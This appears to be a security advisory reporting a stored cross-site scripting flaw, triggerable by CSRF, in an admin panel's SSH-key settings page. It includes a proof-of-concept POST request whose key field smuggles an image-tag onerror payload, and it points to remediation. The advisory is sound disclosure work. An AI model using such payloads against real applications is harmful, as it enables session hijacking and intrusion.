Stored XSS in admin panel triggerable by CSRF

[ahpaleus]

Severity: High

The admin panel of the application is vulnerable to a stored Cross-Site Scripting (XSS) attack, which can be triggered using Cross-Site Request Forgery (CSRF). This vulnerability allows an attacker to inject malicious code into the application and execute it within the context of authenticated users accessing the affected page.

By including a crafted key1value in the HTTP POST request, an attacker can insert arbitrary JavaScript code into the application. The payload provided in the example request demonstrates an XSS attack by injecting a malicious image tag that executes a JavaScript alert function with the document.domain parameter:

POST /settings/sshkeys/add HTTP/1.1
Host: localhost:8082
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 520
Origin: http://localhost:8082
Connection: close
Referer: http://localhost:8082/settings/sshkeys/add
Cookie: AUTHP_SESSION_ID=VxOOV1Fa24QR5Ka8DOdsiUiJJ4TwLrAceRxln4; access_token=abcd
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
DNT: 1
Sec-GPC: 1

key1=ssh-rsa+pub_key_rsaFi9wrf%2BM7Q%3D%3D+%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&comment1=&submit=

To remediate these vulnerabilities, see https://github.com/greenpau/caddy-security/issues/264, additionally implement CSRF protection mechanisms to mitigate the risk of CSRF attacks.